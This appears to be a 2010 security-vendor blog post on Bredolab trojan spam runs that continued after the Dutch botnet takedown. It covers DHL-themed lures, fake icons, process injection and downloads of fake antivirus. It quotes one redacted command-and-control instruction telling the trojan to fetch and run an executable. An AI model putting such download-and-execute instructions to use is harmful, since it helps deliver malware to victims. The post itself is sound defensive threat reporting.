Bredolab is still in the wild
Posted on behalf of Jo Hurcombe and Manoj Venugopalan, Malware Analysts, Symantec Hosted Services
As many of us already heard the great news about Bredolab Malware that been shut down by Dutch authorities.
“On October 25th 2010, the High Tech Crime Team of the Dutch National Crime Squad took down a very large botnet, containing at least 30 million infected computer systems worldwide since July 2009. These computers were infected with the malicious Bredolab trojan, through infected websites. Through these botnets, cybercriminals can spread large amounts of other viruses and create new botnets.
In close cooperation with a Dutch hosting provider, The Dutch Forensic Institute (NFI), the internet security company Fox-IT and GOVCERT, the computer emergency response team of the Dutch government, shut down 143 computer servers today”
But MessageLabs Intelligence is still seeing different Bredolab runs (distributing different payloads) from yesterday morning. The first run started at 09:21AM and ended at around 11:50AM. The second run started at 10:30AM and stopped at 10:50AM. The third run started at 2:30PM and stopped at 3:30PM.
Figure A – Example of recent email with Bredolab attachment.
We have seen more than 750 Bredolab E-mails and nearly 400 among them were targeting Spanish e-mail users. All e-mails contained a similar subject referring to “DHL International.” They have been using the DHL and UPS Invoice subjects for a long time.
Figure B – Installed Bredolab Trojan process using MS Excel icon
As like the other Bredolab malware, it uses fake icons (Fake MS Excel icon in our example ) to deceive the user.
Once the user executes the file, it drops a few hidden files in %system32% and %temp% folder. The downloader hooks into the system to process (svchost.exe in our example ) and connect to its C&C server.
Figure C – Network trace of Bredolab Trojan receiving instructions
Figure D – Detail network trace of Bredolab instruction to download fake security product
In the above example, you can see that it connects to http://<removed>.ru CnC server to download payload.
[info] runurl: http://<removed>/test/<removed>.exe[/info]
Currently this Trojan downloads and installs the Fake AV Products without user knowledge.
Figure E – Example of fake security product installed by the Bredolab Trojan
Symantec Hosted Service detected all malware before it reached the customer.